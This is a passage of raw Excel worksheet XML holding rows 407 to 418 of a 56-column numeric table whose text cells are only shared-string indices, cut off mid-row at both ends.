      <c r="AO407">
        <v>2015</v>
      </c>
      <c r="AP407" t="s">
        <v>3366</v>
      </c>
      <c r="AQ407" t="s">
        <v>3367</v>
      </c>
      <c r="AR407" t="s">
        <v>3368</v>
      </c>
      <c r="AS407" t="s">
        <v>71</v>
      </c>
      <c r="AT407" t="s">
        <v>58</v>
      </c>
      <c r="AU407">
        <v>26</v>
      </c>
      <c r="AV407">
        <v>1</v>
      </c>
      <c r="AW407">
        <v>33</v>
      </c>
      <c r="AX407">
        <v>60</v>
      </c>
      <c r="AY407">
        <v>9</v>
      </c>
      <c r="AZ407">
        <v>6</v>
      </c>
      <c r="BA407" t="s">
        <v>16777</v>
      </c>
      <c r="BB407" t="s">
        <v>14944</v>
      </c>
      <c r="BC407">
        <v>0</v>
      </c>
      <c r="BD407" t="s">
        <v>9624</v>
      </c>
    </row>
    <row r="408" spans="1:56" x14ac:dyDescent="0.2">
      <c r="A408">
        <v>998</v>
      </c>
      <c r="B408" t="s">
        <v>3369</v>
      </c>
      <c r="C408" t="s">
        <v>129</v>
      </c>
      <c r="D408" t="s">
        <v>3370</v>
      </c>
      <c r="E408" t="s">
        <v>142</v>
      </c>
      <c r="F408" t="s">
        <v>2374</v>
      </c>
      <c r="G408" s="1">
        <v>44302</v>
      </c>
      <c r="H408">
        <v>5309</v>
      </c>
      <c r="I408">
        <v>5309</v>
      </c>
      <c r="J408">
        <v>1</v>
      </c>
      <c r="K408">
        <v>1</v>
      </c>
      <c r="L408">
        <v>0</v>
      </c>
      <c r="M408">
        <v>0</v>
      </c>
      <c r="N408">
        <v>0</v>
      </c>
      <c r="O408">
        <v>0</v>
      </c>
      <c r="P408">
        <v>0</v>
      </c>
      <c r="Q408">
        <v>0</v>
      </c>
      <c r="R408">
        <v>0</v>
      </c>
      <c r="S408">
        <v>0</v>
      </c>
      <c r="T408">
        <v>0</v>
      </c>
      <c r="U408">
        <v>300000</v>
      </c>
      <c r="V408">
        <v>300000</v>
      </c>
      <c r="W408">
        <v>0</v>
      </c>
      <c r="X408">
        <v>0</v>
      </c>
      <c r="Y408">
        <v>0</v>
      </c>
      <c r="Z408">
        <v>0</v>
      </c>
      <c r="AA408">
        <v>0</v>
      </c>
      <c r="AB408">
        <v>0</v>
      </c>
      <c r="AC408">
        <v>0</v>
      </c>
      <c r="AD408">
        <v>0</v>
      </c>
      <c r="AE408">
        <v>0</v>
      </c>
      <c r="AF408" t="s">
        <v>3335</v>
      </c>
      <c r="AG408">
        <v>15213</v>
      </c>
      <c r="AH408">
        <v>11</v>
      </c>
      <c r="AJ408">
        <v>268</v>
      </c>
      <c r="AK408" t="s">
        <v>252</v>
      </c>
      <c r="AL408" t="s">
        <v>2955</v>
      </c>
      <c r="AM408" t="s">
        <v>3371</v>
      </c>
      <c r="AN408" t="s">
        <v>55</v>
      </c>
      <c r="AO408">
        <v>2010</v>
      </c>
      <c r="AP408">
        <v>2143937888</v>
      </c>
      <c r="AQ408" t="s">
        <v>3372</v>
      </c>
      <c r="AR408" t="s">
        <v>3338</v>
      </c>
      <c r="AS408" t="s">
        <v>179</v>
      </c>
      <c r="AT408" t="s">
        <v>58</v>
      </c>
      <c r="AU408">
        <v>7</v>
      </c>
      <c r="AV408">
        <v>3</v>
      </c>
      <c r="AW408">
        <v>3</v>
      </c>
      <c r="AX408">
        <v>0</v>
      </c>
      <c r="AY408">
        <v>4</v>
      </c>
      <c r="AZ408">
        <v>1</v>
      </c>
      <c r="BA408" t="s">
        <v>17469</v>
      </c>
      <c r="BB408" t="s">
        <v>14552</v>
      </c>
      <c r="BC408">
        <v>0</v>
      </c>
      <c r="BD408">
        <v>0</v>
      </c>
    </row>
    <row r="409" spans="1:56" x14ac:dyDescent="0.2">
      <c r="A409">
        <v>1558</v>
      </c>
      <c r="B409" t="s">
        <v>3373</v>
      </c>
      <c r="C409" t="s">
        <v>129</v>
      </c>
      <c r="D409" t="s">
        <v>3374</v>
      </c>
      <c r="E409" t="s">
        <v>363</v>
      </c>
      <c r="F409" t="s">
        <v>364</v>
      </c>
      <c r="G409" s="1">
        <v>44155</v>
      </c>
      <c r="H409">
        <v>5367</v>
      </c>
      <c r="I409">
        <v>5367</v>
      </c>
      <c r="J409">
        <v>0</v>
      </c>
      <c r="K409">
        <v>0</v>
      </c>
      <c r="L409">
        <v>0</v>
      </c>
      <c r="M409">
        <v>0</v>
      </c>
      <c r="N409">
        <v>0</v>
      </c>
      <c r="O409">
        <v>0</v>
      </c>
      <c r="P409">
        <v>0</v>
      </c>
      <c r="Q409">
        <v>0</v>
      </c>
      <c r="R409">
        <v>0</v>
      </c>
      <c r="S409">
        <v>1</v>
      </c>
      <c r="T409">
        <v>1</v>
      </c>
      <c r="U409">
        <v>0</v>
      </c>
      <c r="V409">
        <v>0</v>
      </c>
      <c r="W409">
        <v>0</v>
      </c>
      <c r="X409">
        <v>0</v>
      </c>
      <c r="Y409">
        <v>0</v>
      </c>
      <c r="Z409">
        <v>0</v>
      </c>
      <c r="AA409">
        <v>0</v>
      </c>
      <c r="AB409">
        <v>0</v>
      </c>
      <c r="AC409">
        <v>0</v>
      </c>
      <c r="AD409">
        <v>1</v>
      </c>
      <c r="AE409">
        <v>80000</v>
      </c>
      <c r="AF409" t="s">
        <v>3375</v>
      </c>
      <c r="AG409">
        <v>15143</v>
      </c>
      <c r="AH409">
        <v>11</v>
      </c>
      <c r="AJ409">
        <v>270</v>
      </c>
      <c r="AK409" t="s">
        <v>3376</v>
      </c>
      <c r="AL409" t="s">
        <v>3377</v>
      </c>
      <c r="AM409" t="s">
        <v>3378</v>
      </c>
      <c r="AN409" t="s">
        <v>82</v>
      </c>
      <c r="AO409">
        <v>2013</v>
      </c>
      <c r="AP409" t="s">
        <v>3379</v>
      </c>
      <c r="AQ409" t="s">
        <v>3380</v>
      </c>
      <c r="AR409" t="s">
        <v>3381</v>
      </c>
      <c r="AS409" t="s">
        <v>371</v>
      </c>
      <c r="AT409" t="s">
        <v>86</v>
      </c>
      <c r="AU409">
        <v>22</v>
      </c>
      <c r="AV409">
        <v>0</v>
      </c>
      <c r="AW409">
        <v>0</v>
      </c>
      <c r="AX409">
        <v>0</v>
      </c>
      <c r="AY409">
        <v>0</v>
      </c>
      <c r="AZ409">
        <v>0</v>
      </c>
      <c r="BA409" t="s">
        <v>16933</v>
      </c>
      <c r="BB409" t="s">
        <v>15363</v>
      </c>
      <c r="BC409" t="s">
        <v>11662</v>
      </c>
      <c r="BD409">
        <v>0</v>
      </c>
    </row>
    <row r="410" spans="1:56" x14ac:dyDescent="0.2">
      <c r="A410">
        <v>1565</v>
      </c>
      <c r="B410" t="s">
        <v>3382</v>
      </c>
      <c r="C410" t="s">
        <v>458</v>
      </c>
      <c r="D410" t="s">
        <v>3383</v>
      </c>
      <c r="E410" t="s">
        <v>300</v>
      </c>
      <c r="F410" t="s">
        <v>3384</v>
      </c>
      <c r="G410" s="1">
        <v>44232</v>
      </c>
      <c r="H410">
        <v>5384</v>
      </c>
      <c r="I410">
        <v>5384</v>
      </c>
      <c r="J410">
        <v>2</v>
      </c>
      <c r="K410">
        <v>2</v>
      </c>
      <c r="L410">
        <v>2</v>
      </c>
      <c r="M410">
        <v>0</v>
      </c>
      <c r="N410">
        <v>0</v>
      </c>
      <c r="O410">
        <v>0</v>
      </c>
      <c r="P410">
        <v>0</v>
      </c>
      <c r="Q410">
        <v>0</v>
      </c>
      <c r="R410">
        <v>0</v>
      </c>
      <c r="S410">
        <v>0</v>
      </c>
      <c r="T410">
        <v>0</v>
      </c>
      <c r="U410">
        <v>100000</v>
      </c>
      <c r="V410">
        <v>2</v>
      </c>
      <c r="W410">
        <v>2880</v>
      </c>
      <c r="X410">
        <v>0</v>
      </c>
      <c r="Y410">
        <v>0</v>
      </c>
      <c r="Z410">
        <v>0</v>
      </c>
      <c r="AA410">
        <v>0</v>
      </c>
      <c r="AB410">
        <v>0</v>
      </c>
      <c r="AC410">
        <v>0</v>
      </c>
      <c r="AD410">
        <v>0</v>
      </c>
      <c r="AE410">
        <v>0</v>
      </c>
      <c r="AF410" t="s">
        <v>3385</v>
      </c>
      <c r="AG410">
        <v>29151</v>
      </c>
      <c r="AH410">
        <v>5</v>
      </c>
      <c r="AJ410">
        <v>149</v>
      </c>
      <c r="AK410" t="s">
        <v>1355</v>
      </c>
      <c r="AL410" t="s">
        <v>1356</v>
      </c>
      <c r="AM410" t="s">
        <v>3386</v>
      </c>
      <c r="AN410" t="s">
        <v>55</v>
      </c>
      <c r="AO410">
        <v>2009</v>
      </c>
      <c r="AP410" t="s">
        <v>3387</v>
      </c>
      <c r="AQ410" t="s">
        <v>3388</v>
      </c>
      <c r="AR410" t="s">
        <v>3389</v>
      </c>
      <c r="AS410" t="s">
        <v>71</v>
      </c>
      <c r="AT410" t="s">
        <v>58</v>
      </c>
      <c r="AU410">
        <v>6</v>
      </c>
      <c r="AV410">
        <v>1</v>
      </c>
      <c r="AW410">
        <v>42</v>
      </c>
      <c r="AX410">
        <v>11</v>
      </c>
      <c r="AY410">
        <v>5</v>
      </c>
      <c r="AZ410">
        <v>3</v>
      </c>
      <c r="BA410" t="s">
        <v>16936</v>
      </c>
      <c r="BB410" t="s">
        <v>15370</v>
      </c>
      <c r="BC410" t="s">
        <v>10222</v>
      </c>
      <c r="BD410" t="s">
        <v>11683</v>
      </c>
    </row>
    <row r="411" spans="1:56" x14ac:dyDescent="0.2">
      <c r="A411">
        <v>1126</v>
      </c>
      <c r="B411" t="s">
        <v>3390</v>
      </c>
      <c r="C411" t="s">
        <v>168</v>
      </c>
      <c r="D411" t="s">
        <v>3391</v>
      </c>
      <c r="E411" t="s">
        <v>142</v>
      </c>
      <c r="F411" t="s">
        <v>3392</v>
      </c>
      <c r="G411" s="1">
        <v>44081</v>
      </c>
      <c r="H411">
        <v>5414</v>
      </c>
      <c r="I411">
        <v>5414</v>
      </c>
      <c r="J411">
        <v>0</v>
      </c>
      <c r="K411">
        <v>1</v>
      </c>
      <c r="L411">
        <v>2</v>
      </c>
      <c r="M411">
        <v>0</v>
      </c>
      <c r="N411">
        <v>0</v>
      </c>
      <c r="O411">
        <v>0</v>
      </c>
      <c r="P411">
        <v>0</v>
      </c>
      <c r="Q411">
        <v>5</v>
      </c>
      <c r="R411">
        <v>10</v>
      </c>
      <c r="S411">
        <v>0</v>
      </c>
      <c r="T411">
        <v>1</v>
      </c>
      <c r="U411">
        <v>0</v>
      </c>
      <c r="V411">
        <v>30000</v>
      </c>
      <c r="W411">
        <v>25000</v>
      </c>
      <c r="X411">
        <v>0</v>
      </c>
      <c r="Y411">
        <v>0</v>
      </c>
      <c r="Z411">
        <v>0</v>
      </c>
      <c r="AA411">
        <v>0</v>
      </c>
      <c r="AB411">
        <v>50</v>
      </c>
      <c r="AC411">
        <v>100</v>
      </c>
      <c r="AD411">
        <v>0</v>
      </c>
      <c r="AE411">
        <v>50</v>
      </c>
      <c r="AF411" t="s">
        <v>3393</v>
      </c>
      <c r="AG411">
        <v>45151</v>
      </c>
      <c r="AH411">
        <v>13</v>
      </c>
      <c r="AJ411">
        <v>169</v>
      </c>
      <c r="AK411" t="s">
        <v>2639</v>
      </c>
      <c r="AL411" t="s">
        <v>2640</v>
      </c>
      <c r="AM411" t="s">
        <v>3394</v>
      </c>
      <c r="AN411" t="s">
        <v>55</v>
      </c>
      <c r="AO411">
        <v>2009</v>
      </c>
      <c r="AP411">
        <v>2318227329</v>
      </c>
      <c r="AQ411" t="s">
        <v>3395</v>
      </c>
      <c r="AR411" t="s">
        <v>3393</v>
      </c>
      <c r="AS411" t="s">
        <v>71</v>
      </c>
      <c r="AT411" t="s">
        <v>58</v>
      </c>
      <c r="AU411">
        <v>25</v>
      </c>
      <c r="AV411">
        <v>1</v>
      </c>
      <c r="AW411">
        <v>7</v>
      </c>
      <c r="AX411">
        <v>13</v>
      </c>
      <c r="AY411">
        <v>3</v>
      </c>
      <c r="AZ411">
        <v>3</v>
      </c>
      <c r="BA411" t="s">
        <v>17474</v>
      </c>
      <c r="BB411" t="s">
        <v>15065</v>
      </c>
      <c r="BC411">
        <v>0</v>
      </c>
      <c r="BD411" t="s">
        <v>10280</v>
      </c>
    </row>
    <row r="412" spans="1:56" x14ac:dyDescent="0.2">
      <c r="A412">
        <v>1277</v>
      </c>
      <c r="B412" t="s">
        <v>3396</v>
      </c>
      <c r="C412" t="s">
        <v>47</v>
      </c>
      <c r="D412" t="s">
        <v>3397</v>
      </c>
      <c r="E412" t="s">
        <v>363</v>
      </c>
      <c r="F412" t="s">
        <v>3398</v>
      </c>
      <c r="G412" s="1">
        <v>44097</v>
      </c>
      <c r="H412">
        <v>5591</v>
      </c>
      <c r="I412">
        <v>5591</v>
      </c>
      <c r="J412">
        <v>0</v>
      </c>
      <c r="K412">
        <v>0</v>
      </c>
      <c r="L412">
        <v>0</v>
      </c>
      <c r="M412">
        <v>0</v>
      </c>
      <c r="N412">
        <v>0</v>
      </c>
      <c r="O412">
        <v>0</v>
      </c>
      <c r="P412">
        <v>0</v>
      </c>
      <c r="Q412">
        <v>1</v>
      </c>
      <c r="R412">
        <v>0</v>
      </c>
      <c r="S412">
        <v>0</v>
      </c>
      <c r="T412">
        <v>1</v>
      </c>
      <c r="U412">
        <v>0</v>
      </c>
      <c r="V412">
        <v>0</v>
      </c>
      <c r="W412">
        <v>0</v>
      </c>
      <c r="X412">
        <v>0</v>
      </c>
      <c r="Y412">
        <v>0</v>
      </c>
      <c r="Z412">
        <v>0</v>
      </c>
      <c r="AA412">
        <v>0</v>
      </c>
      <c r="AB412">
        <v>5</v>
      </c>
      <c r="AC412">
        <v>0</v>
      </c>
      <c r="AD412">
        <v>0</v>
      </c>
      <c r="AE412">
        <v>5000</v>
      </c>
      <c r="AF412" t="s">
        <v>3399</v>
      </c>
      <c r="AG412">
        <v>20242</v>
      </c>
      <c r="AH412">
        <v>2</v>
      </c>
      <c r="AJ412">
        <v>53</v>
      </c>
      <c r="AK412" t="s">
        <v>1582</v>
      </c>
      <c r="AL412" t="s">
        <v>1583</v>
      </c>
      <c r="AM412" t="s">
        <v>3400</v>
      </c>
      <c r="AN412" t="s">
        <v>55</v>
      </c>
      <c r="AO412">
        <v>2017</v>
      </c>
      <c r="AP412">
        <v>85261191968</v>
      </c>
      <c r="AQ412" t="s">
        <v>3401</v>
      </c>
      <c r="AR412" t="s">
        <v>3399</v>
      </c>
      <c r="AS412" t="s">
        <v>71</v>
      </c>
      <c r="AT412" t="s">
        <v>58</v>
      </c>
      <c r="AU412">
        <v>26</v>
      </c>
      <c r="AV412">
        <v>0</v>
      </c>
      <c r="AW412">
        <v>0</v>
      </c>
      <c r="AX412">
        <v>0</v>
      </c>
      <c r="AY412">
        <v>7</v>
      </c>
      <c r="AZ412">
        <v>0</v>
      </c>
      <c r="BA412" t="s">
        <v>16837</v>
      </c>
      <c r="BB412" t="s">
        <v>15169</v>
      </c>
      <c r="BC412" t="s">
        <v>9603</v>
      </c>
      <c r="BD412" t="s">
        <v>10932</v>
      </c>
    </row>
    <row r="413" spans="1:56" x14ac:dyDescent="0.2">
      <c r="A413">
        <v>1102</v>
      </c>
      <c r="B413" t="s">
        <v>3402</v>
      </c>
      <c r="C413" t="s">
        <v>74</v>
      </c>
      <c r="D413" t="s">
        <v>3403</v>
      </c>
      <c r="E413" t="s">
        <v>142</v>
      </c>
      <c r="F413" t="s">
        <v>3404</v>
      </c>
      <c r="G413" s="1">
        <v>44172</v>
      </c>
      <c r="H413">
        <v>5605</v>
      </c>
      <c r="I413">
        <v>5605</v>
      </c>
      <c r="J413">
        <v>2</v>
      </c>
      <c r="K413">
        <v>2</v>
      </c>
      <c r="L413">
        <v>1</v>
      </c>
      <c r="M413">
        <v>0</v>
      </c>
      <c r="N413">
        <v>0</v>
      </c>
      <c r="O413">
        <v>0</v>
      </c>
      <c r="P413">
        <v>0</v>
      </c>
      <c r="Q413">
        <v>1</v>
      </c>
      <c r="R413">
        <v>1</v>
      </c>
      <c r="S413">
        <v>1</v>
      </c>
      <c r="T413">
        <v>1</v>
      </c>
      <c r="U413">
        <v>6000</v>
      </c>
      <c r="V413">
        <v>2</v>
      </c>
      <c r="W413">
        <v>1000</v>
      </c>
      <c r="X413">
        <v>0</v>
      </c>
      <c r="Y413">
        <v>0</v>
      </c>
      <c r="Z413">
        <v>0</v>
      </c>
      <c r="AA413">
        <v>0</v>
      </c>
      <c r="AB413">
        <v>50</v>
      </c>
      <c r="AC413">
        <v>50</v>
      </c>
      <c r="AD413">
        <v>1</v>
      </c>
      <c r="AE413">
        <v>1000</v>
      </c>
      <c r="AF413" t="s">
        <v>3405</v>
      </c>
      <c r="AG413">
        <v>59185</v>
      </c>
      <c r="AH413">
        <v>14</v>
      </c>
      <c r="AJ413">
        <v>205</v>
      </c>
      <c r="AK413" t="s">
        <v>3221</v>
      </c>
      <c r="AL413" t="s">
        <v>3406</v>
      </c>
      <c r="AM413" t="s">
        <v>3407</v>
      </c>
      <c r="AN413" t="s">
        <v>55</v>
      </c>
      <c r="AO413">
        <v>2010</v>
      </c>
      <c r="AP413" t="s">
        <v>3408</v>
      </c>
      <c r="AQ413">
        <v>85325334404</v>
      </c>
      <c r="AR413" t="s">
        <v>3409</v>
      </c>
      <c r="AS413" t="s">
        <v>71</v>
      </c>
      <c r="AT413" t="s">
        <v>58</v>
      </c>
      <c r="AU413">
        <v>7</v>
      </c>
      <c r="AV413">
        <v>0</v>
      </c>
      <c r="AW413">
        <v>20</v>
      </c>
      <c r="AX413">
        <v>5</v>
      </c>
      <c r="AY413">
        <v>4</v>
      </c>
      <c r="AZ413">
        <v>5</v>
      </c>
      <c r="BA413" t="s">
        <v>17490</v>
      </c>
      <c r="BB413">
        <v>0</v>
      </c>
      <c r="BC413" t="s">
        <v>11759</v>
      </c>
      <c r="BD413">
        <v>0</v>
      </c>
    </row>
    <row r="414" spans="1:56" x14ac:dyDescent="0.2">
      <c r="A414">
        <v>1296</v>
      </c>
      <c r="B414" t="s">
        <v>3410</v>
      </c>
      <c r="C414" t="s">
        <v>157</v>
      </c>
      <c r="D414" t="s">
        <v>3411</v>
      </c>
      <c r="E414" t="s">
        <v>944</v>
      </c>
      <c r="F414" t="s">
        <v>945</v>
      </c>
      <c r="G414" s="1">
        <v>44204</v>
      </c>
      <c r="H414">
        <v>5613</v>
      </c>
      <c r="I414">
        <v>5613</v>
      </c>
      <c r="J414">
        <v>1</v>
      </c>
      <c r="K414">
        <v>0</v>
      </c>
      <c r="L414">
        <v>0</v>
      </c>
      <c r="M414">
        <v>0</v>
      </c>
      <c r="N414">
        <v>0</v>
      </c>
      <c r="O414">
        <v>0</v>
      </c>
      <c r="P414">
        <v>6</v>
      </c>
      <c r="Q414">
        <v>1</v>
      </c>
      <c r="R414">
        <v>1</v>
      </c>
      <c r="S414">
        <v>2</v>
      </c>
      <c r="T414">
        <v>1</v>
      </c>
      <c r="U414">
        <v>2000</v>
      </c>
      <c r="V414">
        <v>0</v>
      </c>
      <c r="W414">
        <v>0</v>
      </c>
      <c r="X414">
        <v>0</v>
      </c>
      <c r="Y414">
        <v>0</v>
      </c>
      <c r="Z414">
        <v>0</v>
      </c>
      <c r="AA414">
        <v>0</v>
      </c>
      <c r="AB414">
        <v>100</v>
      </c>
      <c r="AC414">
        <v>50</v>
      </c>
      <c r="AD414">
        <v>0</v>
      </c>
      <c r="AE414">
        <v>7000</v>
      </c>
      <c r="AF414" t="s">
        <v>3412</v>
      </c>
      <c r="AG414">
        <v>61254</v>
      </c>
      <c r="AH414">
        <v>16</v>
      </c>
      <c r="AJ414">
        <v>242</v>
      </c>
      <c r="AK414" t="s">
        <v>490</v>
      </c>
      <c r="AL414" t="s">
        <v>3413</v>
      </c>
      <c r="AM414" t="s">
        <v>3414</v>
      </c>
      <c r="AN414" t="s">
        <v>55</v>
      </c>
      <c r="AO414">
        <v>2016</v>
      </c>
      <c r="AP414">
        <v>81230826000</v>
      </c>
      <c r="AQ414" t="s">
        <v>3415</v>
      </c>
      <c r="AR414" t="s">
        <v>3412</v>
      </c>
      <c r="AS414" t="s">
        <v>71</v>
      </c>
      <c r="AT414" t="s">
        <v>58</v>
      </c>
      <c r="AU414">
        <v>25</v>
      </c>
      <c r="AV414">
        <v>1</v>
      </c>
      <c r="AW414">
        <v>7</v>
      </c>
      <c r="AX414">
        <v>0</v>
      </c>
      <c r="AY414">
        <v>11</v>
      </c>
      <c r="AZ414">
        <v>4</v>
      </c>
      <c r="BA414" t="s">
        <v>17489</v>
      </c>
      <c r="BB414" t="s">
        <v>15181</v>
      </c>
      <c r="BC414" t="s">
        <v>12760</v>
      </c>
      <c r="BD414">
        <v>0</v>
      </c>
    </row>
    <row r="415" spans="1:56" x14ac:dyDescent="0.2">
      <c r="A415">
        <v>1663</v>
      </c>
      <c r="B415" t="s">
        <v>3416</v>
      </c>
      <c r="C415" t="s">
        <v>189</v>
      </c>
      <c r="D415" t="s">
        <v>3417</v>
      </c>
      <c r="E415" t="s">
        <v>142</v>
      </c>
      <c r="F415" t="s">
        <v>3418</v>
      </c>
      <c r="G415" s="1">
        <v>44096</v>
      </c>
      <c r="H415">
        <v>5632</v>
      </c>
      <c r="I415">
        <v>5632</v>
      </c>
      <c r="J415">
        <v>6</v>
      </c>
      <c r="K415">
        <v>2</v>
      </c>
      <c r="L415">
        <v>6</v>
      </c>
      <c r="M415">
        <v>0</v>
      </c>
      <c r="N415">
        <v>0</v>
      </c>
      <c r="O415">
        <v>2</v>
      </c>
      <c r="P415">
        <v>0</v>
      </c>
      <c r="Q415">
        <v>0</v>
      </c>
      <c r="R415">
        <v>0</v>
      </c>
      <c r="S415">
        <v>0</v>
      </c>
      <c r="T415">
        <v>1</v>
      </c>
      <c r="U415">
        <v>50</v>
      </c>
      <c r="V415">
        <v>10</v>
      </c>
      <c r="W415">
        <v>3000</v>
      </c>
      <c r="X415">
        <v>0</v>
      </c>
      <c r="Y415">
        <v>0</v>
      </c>
      <c r="Z415">
        <v>5000</v>
      </c>
      <c r="AA415">
        <v>0</v>
      </c>
      <c r="AB415">
        <v>0</v>
      </c>
      <c r="AC415">
        <v>0</v>
      </c>
      <c r="AD415">
        <v>0</v>
      </c>
      <c r="AE415">
        <v>10</v>
      </c>
      <c r="AF415" t="s">
        <v>3419</v>
      </c>
      <c r="AG415">
        <v>97582</v>
      </c>
      <c r="AH415">
        <v>31</v>
      </c>
      <c r="AJ415">
        <v>454</v>
      </c>
      <c r="AK415" t="s">
        <v>785</v>
      </c>
      <c r="AL415" t="s">
        <v>786</v>
      </c>
      <c r="AM415" t="s">
        <v>3420</v>
      </c>
      <c r="AN415" t="s">
        <v>55</v>
      </c>
      <c r="AO415">
        <v>1993</v>
      </c>
      <c r="AP415">
        <v>9113303322</v>
      </c>
      <c r="AQ415" t="s">
        <v>3421</v>
      </c>
      <c r="AR415" t="s">
        <v>3419</v>
      </c>
      <c r="AS415" t="s">
        <v>71</v>
      </c>
      <c r="AT415" t="s">
        <v>58</v>
      </c>
      <c r="AU415">
        <v>30</v>
      </c>
      <c r="AV415">
        <v>2</v>
      </c>
      <c r="AW415">
        <v>30</v>
      </c>
      <c r="AX415">
        <v>25</v>
      </c>
      <c r="AY415">
        <v>17</v>
      </c>
      <c r="AZ415">
        <v>12</v>
      </c>
      <c r="BA415" t="s">
        <v>16682</v>
      </c>
      <c r="BB415" t="s">
        <v>17485</v>
      </c>
      <c r="BC415" t="s">
        <v>9536</v>
      </c>
      <c r="BD415" t="s">
        <v>11801</v>
      </c>
    </row>
    <row r="416" spans="1:56" x14ac:dyDescent="0.2">
      <c r="A416">
        <v>1211</v>
      </c>
      <c r="B416" t="s">
        <v>3422</v>
      </c>
      <c r="C416" t="s">
        <v>47</v>
      </c>
      <c r="D416" t="s">
        <v>3423</v>
      </c>
      <c r="E416" t="s">
        <v>142</v>
      </c>
      <c r="F416" t="s">
        <v>3424</v>
      </c>
      <c r="G416" s="1">
        <v>44110</v>
      </c>
      <c r="H416">
        <v>5667</v>
      </c>
      <c r="I416">
        <v>5667</v>
      </c>
      <c r="J416">
        <v>1</v>
      </c>
      <c r="K416">
        <v>0</v>
      </c>
      <c r="L416">
        <v>0</v>
      </c>
      <c r="M416">
        <v>4</v>
      </c>
      <c r="N416">
        <v>0</v>
      </c>
      <c r="O416">
        <v>0</v>
      </c>
      <c r="P416">
        <v>0</v>
      </c>
      <c r="Q416">
        <v>0</v>
      </c>
      <c r="R416">
        <v>0</v>
      </c>
      <c r="S416">
        <v>0</v>
      </c>
      <c r="T416">
        <v>0</v>
      </c>
      <c r="U416">
        <v>300000</v>
      </c>
      <c r="V416">
        <v>0</v>
      </c>
      <c r="W416">
        <v>0</v>
      </c>
      <c r="X416">
        <v>6000</v>
      </c>
      <c r="Y416">
        <v>0</v>
      </c>
      <c r="Z416">
        <v>0</v>
      </c>
      <c r="AA416">
        <v>0</v>
      </c>
      <c r="AB416">
        <v>0</v>
      </c>
      <c r="AC416">
        <v>0</v>
      </c>
      <c r="AD416">
        <v>0</v>
      </c>
      <c r="AE416">
        <v>0</v>
      </c>
      <c r="AF416" t="s">
        <v>3425</v>
      </c>
      <c r="AG416">
        <v>21352</v>
      </c>
      <c r="AH416">
        <v>2</v>
      </c>
      <c r="AJ416">
        <v>50</v>
      </c>
      <c r="AK416" t="s">
        <v>443</v>
      </c>
      <c r="AL416" t="s">
        <v>668</v>
      </c>
      <c r="AM416" t="s">
        <v>3426</v>
      </c>
      <c r="AN416" t="s">
        <v>55</v>
      </c>
      <c r="AO416">
        <v>2017</v>
      </c>
      <c r="AP416">
        <v>81361581758</v>
      </c>
      <c r="AQ416" t="s">
        <v>3427</v>
      </c>
      <c r="AR416" t="s">
        <v>3428</v>
      </c>
      <c r="AS416" t="s">
        <v>71</v>
      </c>
      <c r="AT416" t="s">
        <v>58</v>
      </c>
      <c r="AU416">
        <v>30</v>
      </c>
      <c r="AV416">
        <v>1</v>
      </c>
      <c r="AW416">
        <v>4</v>
      </c>
      <c r="AX416">
        <v>22</v>
      </c>
      <c r="AY416">
        <v>2</v>
      </c>
      <c r="AZ416">
        <v>4</v>
      </c>
      <c r="BA416" t="s">
        <v>16820</v>
      </c>
      <c r="BB416" t="s">
        <v>15127</v>
      </c>
      <c r="BC416">
        <v>0</v>
      </c>
      <c r="BD416" t="s">
        <v>11797</v>
      </c>
    </row>
    <row r="417" spans="1:56" x14ac:dyDescent="0.2">
      <c r="A417">
        <v>896</v>
      </c>
      <c r="B417" t="s">
        <v>3429</v>
      </c>
      <c r="C417" t="s">
        <v>74</v>
      </c>
      <c r="D417" t="s">
        <v>3430</v>
      </c>
      <c r="E417" t="s">
        <v>479</v>
      </c>
      <c r="F417" t="s">
        <v>3431</v>
      </c>
      <c r="G417" s="1">
        <v>44176</v>
      </c>
      <c r="H417">
        <v>5688</v>
      </c>
      <c r="I417">
        <v>5688</v>
      </c>
      <c r="J417">
        <v>0</v>
      </c>
      <c r="K417">
        <v>2</v>
      </c>
      <c r="L417">
        <v>1</v>
      </c>
      <c r="M417">
        <v>0</v>
      </c>
      <c r="N417">
        <v>0</v>
      </c>
      <c r="O417">
        <v>0</v>
      </c>
      <c r="P417">
        <v>0</v>
      </c>
      <c r="Q417">
        <v>5</v>
      </c>
      <c r="R417">
        <v>1</v>
      </c>
      <c r="S417">
        <v>0</v>
      </c>
      <c r="T417">
        <v>1</v>
      </c>
      <c r="U417">
        <v>0</v>
      </c>
      <c r="V417">
        <v>100000</v>
      </c>
      <c r="W417">
        <v>4000</v>
      </c>
      <c r="X417">
        <v>0</v>
      </c>
      <c r="Y417">
        <v>0</v>
      </c>
      <c r="Z417">
        <v>0</v>
      </c>
      <c r="AA417">
        <v>0</v>
      </c>
      <c r="AB417">
        <v>200</v>
      </c>
      <c r="AC417">
        <v>1000</v>
      </c>
      <c r="AD417">
        <v>0</v>
      </c>
      <c r="AE417">
        <v>4000</v>
      </c>
      <c r="AF417" t="s">
        <v>3432</v>
      </c>
      <c r="AG417">
        <v>59432</v>
      </c>
      <c r="AH417">
        <v>14</v>
      </c>
      <c r="AJ417">
        <v>207</v>
      </c>
      <c r="AK417" t="s">
        <v>3433</v>
      </c>
      <c r="AL417" t="s">
        <v>3434</v>
      </c>
      <c r="AM417" t="s">
        <v>3435</v>
      </c>
      <c r="AN417" t="s">
        <v>55</v>
      </c>
      <c r="AO417">
        <v>2013</v>
      </c>
      <c r="AP417">
        <v>2914296527</v>
      </c>
      <c r="AQ417" t="s">
        <v>3436</v>
      </c>
      <c r="AR417" t="s">
        <v>3437</v>
      </c>
      <c r="AS417" t="s">
        <v>71</v>
      </c>
      <c r="AT417" t="s">
        <v>58</v>
      </c>
      <c r="AU417">
        <v>312</v>
      </c>
      <c r="AV417">
        <v>1</v>
      </c>
      <c r="AW417">
        <v>3</v>
      </c>
      <c r="AX417">
        <v>167</v>
      </c>
      <c r="AY417">
        <v>14</v>
      </c>
      <c r="AZ417">
        <v>34</v>
      </c>
      <c r="BA417" t="s">
        <v>16772</v>
      </c>
      <c r="BB417" t="s">
        <v>14921</v>
      </c>
      <c r="BC417" t="s">
        <v>9485</v>
      </c>
      <c r="BD417" t="s">
        <v>10630</v>
      </c>
    </row>
    <row r="418" spans="1:56" x14ac:dyDescent="0.2">
      <c r="A418">
        <v>1123</v>
      </c>
      <c r="B418" t="s">
        <v>3438</v>
      </c>
      <c r="C418" t="s">
        <v>129</v>
      </c>
      <c r="D418" t="s">
        <v>3439</v>
      </c>
      <c r="E418" t="s">
        <v>3440</v>
      </c>
      <c r="F418" t="s">
        <v>3441</v>
      </c>
      <c r="G418" s="1">
        <v>44145</v>
      </c>
      <c r="H418">
        <v>5749</v>
      </c>
      <c r="I418">
        <v>5749</v>
